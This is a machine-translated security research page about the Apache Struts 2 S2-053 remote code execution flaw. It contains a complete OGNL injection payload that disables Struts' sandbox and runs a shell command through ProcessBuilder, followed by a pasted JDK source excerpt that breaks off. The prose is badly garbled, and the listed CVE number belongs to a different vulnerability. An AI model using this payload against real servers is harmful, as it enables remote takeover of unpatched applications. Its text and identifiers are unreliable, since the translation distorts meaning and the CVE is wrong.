Struts 2 S2-053 flaws vulnerability bug thematic research with the POC-the exploit-warning-the black bar safety net

2017-09-17T00:00:00
ID MYHACK58:62201789313
Type myhack58
Reporter 佚名
Modified 2017-09-17T00:00:00

Description

Flaws vulnerability bug overview

Flaws vulnerability bug example

Long distance code to fulfil flaws vulnerability bug

CVE-ID

CVE-2017-1000112

Persecution of the grade

High-risk

Impact version

Struts 2.0.1 Struts 2.3.33 Struts 2.5 – Struts 2.5.10

Flaws vulnerability bug persecution

When the developer in the Freemarker tags in applications the following code when<@s. hidden name=”redirectUri” value=redirectUri /><@s. hidden name=”redirectUri” value=”${redirectUri}” />Freemarker will be a value when the expression stops fulfill, at last incurred the code to fulfill.

poc example

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). (#_memberAccess? (#_memberAccess=#dm):((#container=#context['com. opensymphony. xwork2. ActionContext. container']). (#ognlUtil=#container. getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)). (#ognlUtil. getExcludedPackageNames(). clear()). (#ognlUtil. getExcludedClasses(). clear()). (#context. setMemberAccess(#dm)))). (#cmd='/usr/bin/touch /tmp/vuln'). (#iswin=(@java.lang.System@getProperty('os. name'). toLowerCase(). contains('win'))). (#cmds=(#iswin? {'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})). (#p=new java. lang. ProcessBuilder(#cmds)). (#p. redirectErrorStream(true)). (#process=#p. start()). (#ros=(@org.apache.struts2.ServletActionContext@getResponse(). getOutputStream())). (@org.apache.commons.io.IOUtils@copy(#process. getInputStream(),#ros)). (#ros. flush())} poc debugging

A brief browse of the poc, in accordance with the usual practice, the Breakpoints hit in the ProcessBuilder class start()way

//the java. lang. ProcessBuilder public Process start() throws IOException { // Must convert to array first -- a malicious user-supplied // list might try to circumvent the security check. String[] cmdarray = command. toArray(new String[command. size()]); cmdarray = cmdarray. clone(); for (String arg : cmdarray) if (arg == null) throw new NullPointerException(); // Throws IndexOutOfBoundsException if command is empty String prog = cmdarray[0]; SecurityManager security = System. getSecurityManager(); if (security != null) security. checkExec(prog); String dir = directory == null ? null : directory. toString(); for (int i = 1; i < cmdarray. length; i++) { if (cmdarray[i]. indexOf('\u0000') >= 0) { throw new IOException("invalid null character in command"); } } try { return ProcessImpl. start(cmdarray, environment, dir, redirects, redirectErrorStream); } catch (IOException | IllegalArgumentException e) { String exceptionInfo = ": "+ e. getMessage(); Throwable cause = e; if ((e instanceof IOException) && amp; security != null) { // Can not disclose the fail reason for read-protected files. try { security. checkRead(prog);

[1] [2] [3] [4] [5] next